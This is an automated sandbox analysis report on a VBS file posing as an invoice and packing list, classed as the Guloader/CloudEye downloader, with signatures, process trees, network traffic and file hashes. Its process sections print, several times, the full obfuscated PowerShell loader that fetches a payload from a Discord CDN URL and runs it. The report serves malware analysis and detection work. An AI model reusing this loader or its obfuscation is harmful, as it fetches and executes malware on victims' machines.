Analysis Overview
SHA256
d327a71665c7df97c34a5246c79c5ce6a4deccf5e470e048e6ef6c978bb9128a
Threat Level: Known bad
The file INVOICE2023310643_Packing_List__CMR.vbs.malz was found to be: Known bad.
Malicious Activity Summary
Guloader,Cloudeye
Blocklisted process makes network request
Checks QEMU agent file
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
Program crash
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-08-07 18:47
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-08-07 18:47
Reported
2023-08-07 18:50
Platform
win7-20230712-en
Max time kernel
147s
Max time network
150s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INVOICE2023310643_Packing_List__CMR.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sanaisoler959 ([String]$Subj){For($Overcau=1; $Overcau -lt $Subj.Length-1; $Overcau+=(1+1)){$Talebooktr=$Subj.Substring($Overcau, 1);$merka=$merka+$Talebooktr}$merka;}$Pyro=Sanaisoler959 ' hAtKtDpPsL: /D/IcRdFnO.BdLiTs c oSrbdUalpSp .GcOo md/RaCtctSaMcThNmSePnCtLsA/V1P1C3F6L0A9K4N1B8K2S2H4S7S7 7F6B4 4C1T/S1S1S3p7D8s7m1 1 2A4N9E2D3M9 4B5N1E5S2 /FSSpSrAoBgKfPrAiVnYgD.BdSwBp ';$merka01=Sanaisoler959 ' iBePxM ';$Brneraps = Sanaisoler959 ' \SsGyRsLwBo wT6T4G\CWAiDnPdOo wAsNPboFwOe r SHhseFlblU\Tv 1J.I0p\EpOoHwAePrSssh eSlUlI.PeWxReC ';&($merka01) (Sanaisoler959 'R$acFoBrFrNuFpEtSnFeGsS2T=H$ReDnLvF:AwJiSnVdAi r ') ;&($merka01) (Sanaisoler959 'V$BBsrInce rFa p sS=P$ScNoRrVrCuUpMtOnReSs 2G+L$SBBrTn eSrUaApSsU ') ;&($merka01) (Sanaisoler959 'A$ ASnIdPsEtIsDhGaTfSfM H=O T(B(SgLwFmBis swAiSnF3A2F_Fp rHoAcreDsVsE O-SFH NP rSo cCe sNsSI dB=Q$E{MPfIJDL}k) .ICSoSmUmTa nOdILTiHnFeH)R d-PsRp l iPtN a[Sc hHarrg] 3F4 ');&($merka01) (Sanaisoler959 ' $BGFeCvTaIeA6S5O G=k N$SA nOdts tTsLhSaMfDfA[U$rADn d sktDslhBaIfMfL.BcUo uQnntT- 2S]T ');&($merka01) (Sanaisoler959 's$HA lcpAhMoD=k(BTBeqsFts-IP aKtThP K$dBFrSn ePrCaGpUsS)P -DAKnDdl F(L[iISnmtgPAt r ]L:C:TsViIz en T- eBqM 8 )A ') ;if ($Alpho) {.$Brneraps $Gevae65;} else {;$merka00=Sanaisoler959 ' SStAaBrItS- BCiKt sUTSrCaRnHsSfKegr S-KSToHuUrVcbeP $DPny rCoA K- DFeSsPtSiSnZa tNiTo n M$ScAoJrCrEu p tOn e sA2F ';&($merka01) (Sanaisoler959 ' $VcGoFrCrFu pAtFndeKs 2L=C$AeRnhvP:HaPpRp dBahtDaD ') ;&($merka01) (Sanaisoler959 'UIVmIpToGrUt - M o d uRlMeU PB iAt s Tpr aVnHswfAeBr ') ;$corruptnes2=$corruptnes2+'\Toileda.Bun';while (-not $Campierpl) {&($merka01) (Sanaisoler959 'H$uCIaKm p iSeBr pLlA=s(PTfeCs tI-ZPMaCt ho G$AcPoFrKrOu pHtTnCeSsN2s) ') ;&($merka01) $merka00;&($merka01) (Sanaisoler959 'WSAtGaLrEtS-SSPlDePeFpE C5C ');}&($merka01) (Sanaisoler959 'P$RStaGn aIiBsFo lBeOrA9T5R F= TGTePtC-SCAoMnLtCeAn tK S$ cSoSrFrVu pHt nAeNs 2 ');&($merka01) (Sanaisoler959 'G$sSZtWoAlneBrV2N1 1G S=E M[OSUyPs tCeMmB.MC oSn vEe r tI]C:B:MFCr oPm BAaMsOe 6T4SSBtTrBiGnbgA(D$kSOaLnDaSi sMoAlFe rw9 5V)P ');&($merka01) (Sanaisoler959 'N$Am errPk a 2S =S S[TSRySs tIeHmD. TAeIxstN. E n c oKdAi n g ]O:R:UASSPCDI IE.FGReEtUSHtLr iKnAg (l$ STtVoSlDeVrO2 1 1 )C ');&($merka01) (Sanaisoler959 ' $hRCePgReVlNm sSs iH=O$DmaeDr kba 2 . sfuNbLsAtBrYiLnTgU(B2E3S8O0D6R5T, 1S9B4B3P5L)S ');&($merka01) $Regelmssi;}"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Sanaisoler959 ([String]$Subj){For($Overcau=1; $Overcau -lt $Subj.Length-1; $Overcau+=(1+1)){$Talebooktr=$Subj.Substring($Overcau, 1);$merka=$merka+$Talebooktr}$merka;}$Pyro=Sanaisoler959 ' hAtKtDpPsL: /D/IcRdFnO.BdLiTs c oSrbdUalpSp .GcOo md/RaCtctSaMcThNmSePnCtLsA/V1P1C3F6L0A9K4N1B8K2S2H4S7S7 7F6B4 4C1T/S1S1S3p7D8s7m1 1 2A4N9E2D3M9 4B5N1E5S2 /FSSpSrAoBgKfPrAiVnYgD.BdSwBp ';$merka01=Sanaisoler959 ' iBePxM ';$Brneraps = Sanaisoler959 ' \SsGyRsLwBo wT6T4G\CWAiDnPdOo wAsNPboFwOe r SHhseFlblU\Tv 1J.I0p\EpOoHwAePrSssh eSlUlI.PeWxReC ';&($merka01) (Sanaisoler959 'R$acFoBrFrNuFpEtSnFeGsS2T=H$ReDnLvF:AwJiSnVdAi r ') ;&($merka01) (Sanaisoler959 'V$BBsrInce rFa p sS=P$ScNoRrVrCuUpMtOnReSs 2G+L$SBBrTn eSrUaApSsU ') ;&($merka01) (Sanaisoler959 'A$ ASnIdPsEtIsDhGaTfSfM H=O T(B(SgLwFmBis swAiSnF3A2F_Fp rHoAcreDsVsE O-SFH NP rSo cCe sNsSI dB=Q$E{MPfIJDL}k) .ICSoSmUmTa nOdILTiHnFeH)R d-PsRp l iPtN a[Sc hHarrg] 3F4 ');&($merka01) (Sanaisoler959 ' $BGFeCvTaIeA6S5O G=k N$SA nOdts tTsLhSaMfDfA[U$rADn d sktDslhBaIfMfL.BcUo uQnntT- 2S]T ');&($merka01) (Sanaisoler959 's$HA lcpAhMoD=k(BTBeqsFts-IP aKtThP K$dBFrSn ePrCaGpUsS)P -DAKnDdl F(L[iISnmtgPAt r ]L:C:TsViIz en T- eBqM 8 )A ') ;if ($Alpho) {.$Brneraps $Gevae65;} else {;$merka00=Sanaisoler959 ' SStAaBrItS- BCiKt sUTSrCaRnHsSfKegr S-KSToHuUrVcbeP $DPny rCoA K- DFeSsPtSiSnZa tNiTo n M$ScAoJrCrEu p tOn e sA2F ';&($merka01) (Sanaisoler959 ' $VcGoFrCrFu pAtFndeKs 2L=C$AeRnhvP:HaPpRp dBahtDaD ') ;&($merka01) (Sanaisoler959 'UIVmIpToGrUt - M o d uRlMeU PB iAt s Tpr aVnHswfAeBr ') ;$corruptnes2=$corruptnes2+'\Toileda.Bun';while (-not $Campierpl) {&($merka01) (Sanaisoler959 'H$uCIaKm p iSeBr pLlA=s(PTfeCs tI-ZPMaCt ho G$AcPoFrKrOu pHtTnCeSsN2s) ') ;&($merka01) $merka00;&($merka01) (Sanaisoler959 'WSAtGaLrEtS-SSPlDePeFpE C5C ');}&($merka01) (Sanaisoler959 'P$RStaGn aIiBsFo lBeOrA9T5R F= TGTePtC-SCAoMnLtCeAn tK S$ cSoSrFrVu pHt nAeNs 2 ');&($merka01) (Sanaisoler959 'G$sSZtWoAlneBrV2N1 1G S=E M[OSUyPs tCeMmB.MC oSn vEe r tI]C:B:MFCr oPm BAaMsOe 6T4SSBtTrBiGnbgA(D$kSOaLnDaSi sMoAlFe rw9 5V)P ');&($merka01) (Sanaisoler959 'N$Am errPk a 2S =S S[TSRySs tIeHmD. TAeIxstN. E n c oKdAi n g ]O:R:UASSPCDI IE.FGReEtUSHtLr iKnAg (l$ STtVoSlDeVrO2 1 1 )C ');&($merka01) (Sanaisoler959 ' $hRCePgReVlNm sSs iH=O$DmaeDr kba 2 . sfuNbLsAtBrYiLnTgU(B2E3S8O0D6R5T, 1S9B4B3P5L)S ');&($merka01) $Regelmssi;}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\Cab6E11.tmp
| MD5 | 3ac860860707baaf32469fa7cc7c0192 |
| SHA1 | c33c2acdaba0e6fa41fd2f00f186804722477639 |
| SHA256 | d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904 |
| SHA512 | d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c |
memory/3004-74-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp
memory/3004-75-0x0000000002670000-0x00000000026F0000-memory.dmp
memory/3004-76-0x000000001B330000-0x000000001B612000-memory.dmp
memory/3004-78-0x0000000001FB0000-0x0000000001FB8000-memory.dmp
memory/3004-77-0x0000000002670000-0x00000000026F0000-memory.dmp
memory/3004-79-0x0000000002670000-0x00000000026F0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5X0NTGQAB7G2ZI4JOQHC.temp
| MD5 | 160a4e3770db46a442e4bce168a5bb76 |
| SHA1 | d45614566e57c35168415c6979ac057f62d8fea8 |
| SHA256 | 75c7f73447027465482349e5343959720f934215bbe74796650284611e34c32d |
| SHA512 | a1f73ed435910a8d14e53c15b76f8c3117733a18caf670d17e4bede635530e5545b346ed53801dcf14777e05b9f13849a5ca750892cd85f3dd43c7d5e18c1930 |
memory/2264-82-0x00000000738B0000-0x0000000073E5B000-memory.dmp
memory/2264-85-0x00000000027E0000-0x0000000002820000-memory.dmp
memory/2264-84-0x00000000027E0000-0x0000000002820000-memory.dmp
memory/2264-83-0x00000000738B0000-0x0000000073E5B000-memory.dmp
memory/3004-86-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp
memory/3004-87-0x0000000002670000-0x00000000026F0000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | a6a9df95dca8497bc5ed1a0f159c6b9d |
| SHA1 | 8f3cf11fbe4f2f5cabaa115b8eeefb0e6f93c63e |
| SHA256 | 410dd1f40fd5c2b157687fd53feed90bcb2758acae145fc453b8be644968ec40 |
| SHA512 | 3b569e507196da6742046ec12a82f013632c755167e7f693ef6b87d666d5a6048a052e58f098d07f71c7081a0f8d398f260e5e094d1d5aae1adebc9cd5449466 |
C:\Users\Admin\AppData\Local\Temp\Tar72E0.tmp
| MD5 | 4ff65ad929cd9a367680e0e5b1c08166 |
| SHA1 | c0af0d4396bd1f15c45f39d3b849ba444233b3a2 |
| SHA256 | c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6 |
| SHA512 | f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27 |
memory/3004-98-0x000007FEF5BF0000-0x000007FEF658D000-memory.dmp
memory/3004-99-0x0000000002670000-0x00000000026F0000-memory.dmp
memory/3004-100-0x0000000002670000-0x00000000026F0000-memory.dmp
memory/2264-101-0x00000000738B0000-0x0000000073E5B000-memory.dmp
memory/2264-102-0x00000000027E0000-0x0000000002820000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2023-08-07 18:47
Reported
2023-08-07 18:50
Platform
win10v2004-20230703-en
Max time kernel
139s
Max time network
155s
Command Line
Signatures
Guloader,Cloudeye
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks QEMU agent file
| Description | Indicator | Process | Target |
| File opened (read-only) | C:\Program Files\Qemu-ga\qemu-ga.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4404 wrote to memory of 2364 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 4404 wrote to memory of 2364 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2364 wrote to memory of 4728 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2364 wrote to memory of 4728 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2364 wrote to memory of 4728 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\INVOICE2023310643_Packing_List__CMR.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sanaisoler959 ([String]$Subj){For($Overcau=1; $Overcau -lt $Subj.Length-1; $Overcau+=(1+1)){$Talebooktr=$Subj.Substring($Overcau, 1);$merka=$merka+$Talebooktr}$merka;}$Pyro=Sanaisoler959 ' hAtKtDpPsL: /D/IcRdFnO.BdLiTs c oSrbdUalpSp .GcOo md/RaCtctSaMcThNmSePnCtLsA/V1P1C3F6L0A9K4N1B8K2S2H4S7S7 7F6B4 4C1T/S1S1S3p7D8s7m1 1 2A4N9E2D3M9 4B5N1E5S2 /FSSpSrAoBgKfPrAiVnYgD.BdSwBp ';$merka01=Sanaisoler959 ' iBePxM ';$Brneraps = Sanaisoler959 ' \SsGyRsLwBo wT6T4G\CWAiDnPdOo wAsNPboFwOe r SHhseFlblU\Tv 1J.I0p\EpOoHwAePrSssh eSlUlI.PeWxReC ';&($merka01) (Sanaisoler959 'R$acFoBrFrNuFpEtSnFeGsS2T=H$ReDnLvF:AwJiSnVdAi r ') ;&($merka01) (Sanaisoler959 'V$BBsrInce rFa p sS=P$ScNoRrVrCuUpMtOnReSs 2G+L$SBBrTn eSrUaApSsU ') ;&($merka01) (Sanaisoler959 'A$ ASnIdPsEtIsDhGaTfSfM H=O T(B(SgLwFmBis swAiSnF3A2F_Fp rHoAcreDsVsE O-SFH NP rSo cCe sNsSI dB=Q$E{MPfIJDL}k) .ICSoSmUmTa nOdILTiHnFeH)R d-PsRp l iPtN a[Sc hHarrg] 3F4 ');&($merka01) (Sanaisoler959 ' $BGFeCvTaIeA6S5O G=k N$SA nOdts tTsLhSaMfDfA[U$rADn d sktDslhBaIfMfL.BcUo uQnntT- 2S]T ');&($merka01) (Sanaisoler959 's$HA lcpAhMoD=k(BTBeqsFts-IP aKtThP K$dBFrSn ePrCaGpUsS)P -DAKnDdl F(L[iISnmtgPAt r ]L:C:TsViIz en T- eBqM 8 )A ') ;if ($Alpho) {.$Brneraps $Gevae65;} else {;$merka00=Sanaisoler959 ' SStAaBrItS- BCiKt sUTSrCaRnHsSfKegr S-KSToHuUrVcbeP $DPny rCoA K- DFeSsPtSiSnZa tNiTo n M$ScAoJrCrEu p tOn e sA2F ';&($merka01) (Sanaisoler959 ' $VcGoFrCrFu pAtFndeKs 2L=C$AeRnhvP:HaPpRp dBahtDaD ') ;&($merka01) (Sanaisoler959 'UIVmIpToGrUt - M o d uRlMeU PB iAt s Tpr aVnHswfAeBr ') ;$corruptnes2=$corruptnes2+'\Toileda.Bun';while (-not $Campierpl) {&($merka01) (Sanaisoler959 'H$uCIaKm p iSeBr pLlA=s(PTfeCs tI-ZPMaCt ho G$AcPoFrKrOu pHtTnCeSsN2s) ') ;&($merka01) $merka00;&($merka01) (Sanaisoler959 'WSAtGaLrEtS-SSPlDePeFpE C5C ');}&($merka01) (Sanaisoler959 'P$RStaGn aIiBsFo lBeOrA9T5R F= TGTePtC-SCAoMnLtCeAn tK S$ cSoSrFrVu pHt nAeNs 2 ');&($merka01) (Sanaisoler959 'G$sSZtWoAlneBrV2N1 1G S=E M[OSUyPs tCeMmB.MC oSn vEe r tI]C:B:MFCr oPm BAaMsOe 6T4SSBtTrBiGnbgA(D$kSOaLnDaSi sMoAlFe rw9 5V)P ');&($merka01) (Sanaisoler959 'N$Am errPk a 2S =S S[TSRySs tIeHmD. TAeIxstN. E n c oKdAi n g ]O:R:UASSPCDI IE.FGReEtUSHtLr iKnAg (l$ STtVoSlDeVrO2 1 1 )C ');&($merka01) (Sanaisoler959 ' $hRCePgReVlNm sSs iH=O$DmaeDr kba 2 . sfuNbLsAtBrYiLnTgU(B2E3S8O0D6R5T, 1S9B4B3P5L)S ');&($merka01) $Regelmssi;}"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Sanaisoler959 ([String]$Subj){For($Overcau=1; $Overcau -lt $Subj.Length-1; $Overcau+=(1+1)){$Talebooktr=$Subj.Substring($Overcau, 1);$merka=$merka+$Talebooktr}$merka;}$Pyro=Sanaisoler959 ' hAtKtDpPsL: /D/IcRdFnO.BdLiTs c oSrbdUalpSp .GcOo md/RaCtctSaMcThNmSePnCtLsA/V1P1C3F6L0A9K4N1B8K2S2H4S7S7 7F6B4 4C1T/S1S1S3p7D8s7m1 1 2A4N9E2D3M9 4B5N1E5S2 /FSSpSrAoBgKfPrAiVnYgD.BdSwBp ';$merka01=Sanaisoler959 ' iBePxM ';$Brneraps = Sanaisoler959 ' \SsGyRsLwBo wT6T4G\CWAiDnPdOo wAsNPboFwOe r SHhseFlblU\Tv 1J.I0p\EpOoHwAePrSssh eSlUlI.PeWxReC ';&($merka01) (Sanaisoler959 'R$acFoBrFrNuFpEtSnFeGsS2T=H$ReDnLvF:AwJiSnVdAi r ') ;&($merka01) (Sanaisoler959 'V$BBsrInce rFa p sS=P$ScNoRrVrCuUpMtOnReSs 2G+L$SBBrTn eSrUaApSsU ') ;&($merka01) (Sanaisoler959 'A$ ASnIdPsEtIsDhGaTfSfM H=O T(B(SgLwFmBis swAiSnF3A2F_Fp rHoAcreDsVsE O-SFH NP rSo cCe sNsSI dB=Q$E{MPfIJDL}k) .ICSoSmUmTa nOdILTiHnFeH)R d-PsRp l iPtN a[Sc hHarrg] 3F4 ');&($merka01) (Sanaisoler959 ' $BGFeCvTaIeA6S5O G=k N$SA nOdts tTsLhSaMfDfA[U$rADn d sktDslhBaIfMfL.BcUo uQnntT- 2S]T ');&($merka01) (Sanaisoler959 's$HA lcpAhMoD=k(BTBeqsFts-IP aKtThP K$dBFrSn ePrCaGpUsS)P -DAKnDdl F(L[iISnmtgPAt r ]L:C:TsViIz en T- eBqM 8 )A ') ;if ($Alpho) {.$Brneraps $Gevae65;} else {;$merka00=Sanaisoler959 ' SStAaBrItS- BCiKt sUTSrCaRnHsSfKegr S-KSToHuUrVcbeP $DPny rCoA K- DFeSsPtSiSnZa tNiTo n M$ScAoJrCrEu p tOn e sA2F ';&($merka01) (Sanaisoler959 ' $VcGoFrCrFu pAtFndeKs 2L=C$AeRnhvP:HaPpRp dBahtDaD ') ;&($merka01) (Sanaisoler959 'UIVmIpToGrUt - M o d uRlMeU PB iAt s Tpr aVnHswfAeBr ') ;$corruptnes2=$corruptnes2+'\Toileda.Bun';while (-not $Campierpl) {&($merka01) (Sanaisoler959 'H$uCIaKm p iSeBr pLlA=s(PTfeCs tI-ZPMaCt ho G$AcPoFrKrOu pHtTnCeSsN2s) ') ;&($merka01) $merka00;&($merka01) (Sanaisoler959 'WSAtGaLrEtS-SSPlDePeFpE C5C ');}&($merka01) (Sanaisoler959 'P$RStaGn aIiBsFo lBeOrA9T5R F= TGTePtC-SCAoMnLtCeAn tK S$ cSoSrFrVu pHt nAeNs 2 ');&($merka01) (Sanaisoler959 'G$sSZtWoAlneBrV2N1 1G S=E M[OSUyPs tCeMmB.MC oSn vEe r tI]C:B:MFCr oPm BAaMsOe 6T4SSBtTrBiGnbgA(D$kSOaLnDaSi sMoAlFe rw9 5V)P ');&($merka01) (Sanaisoler959 'N$Am errPk a 2S =S S[TSRySs tIeHmD. TAeIxstN. E n c oKdAi n g ]O:R:UASSPCDI IE.FGReEtUSHtLr iKnAg (l$ STtVoSlDeVrO2 1 1 )C ');&($merka01) (Sanaisoler959 ' $hRCePgReVlNm sSs iH=O$DmaeDr kba 2 . sfuNbLsAtBrYiLnTgU(B2E3S8O0D6R5T, 1S9B4B3P5L)S ');&($merka01) $Regelmssi;}"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4728 -ip 4728
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1724
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 146.78.124.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.252.72.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.240.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.3.197.209.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.13.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.173.189.20.in-addr.arpa | udp |
Files
memory/2364-137-0x00000181341E0000-0x0000018134202000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nwzssja3.hyf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2364-147-0x00007FFEF3190000-0x00007FFEF3C51000-memory.dmp
memory/2364-148-0x0000018134160000-0x0000018134170000-memory.dmp
memory/2364-149-0x0000018134160000-0x0000018134170000-memory.dmp
memory/4728-151-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/4728-150-0x0000000002460000-0x0000000002496000-memory.dmp
memory/4728-152-0x0000000004B00000-0x0000000004B10000-memory.dmp
memory/4728-153-0x0000000005140000-0x0000000005768000-memory.dmp
memory/4728-154-0x0000000004EB0000-0x0000000004ED2000-memory.dmp
memory/4728-155-0x0000000004F50000-0x0000000004FB6000-memory.dmp
memory/4728-161-0x0000000005770000-0x00000000057D6000-memory.dmp
memory/4728-166-0x0000000005DB0000-0x0000000005DCE000-memory.dmp
memory/2364-167-0x00007FFEF3190000-0x00007FFEF3C51000-memory.dmp
memory/2364-168-0x0000018134160000-0x0000018134170000-memory.dmp
memory/4728-169-0x0000000007620000-0x0000000007C9A000-memory.dmp
memory/4728-170-0x0000000006350000-0x000000000636A000-memory.dmp
memory/4728-171-0x0000000007050000-0x00000000070E6000-memory.dmp
memory/4728-172-0x00000000063C0000-0x00000000063E2000-memory.dmp
memory/4728-173-0x0000000008250000-0x00000000087F4000-memory.dmp
memory/4728-174-0x00000000073F0000-0x0000000007404000-memory.dmp
memory/4728-175-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/4728-176-0x0000000004B00000-0x0000000004B10000-memory.dmp
memory/4728-178-0x0000000007430000-0x0000000007431000-memory.dmp
memory/4728-179-0x0000000008800000-0x000000000B34A000-memory.dmp
memory/4728-180-0x0000000008800000-0x000000000B34A000-memory.dmp
memory/4728-181-0x0000000077B61000-0x0000000077C81000-memory.dmp
memory/4728-182-0x0000000075140000-0x00000000758F0000-memory.dmp
memory/4728-183-0x0000000008800000-0x000000000B34A000-memory.dmp
memory/2364-186-0x00007FFEF3190000-0x00007FFEF3C51000-memory.dmp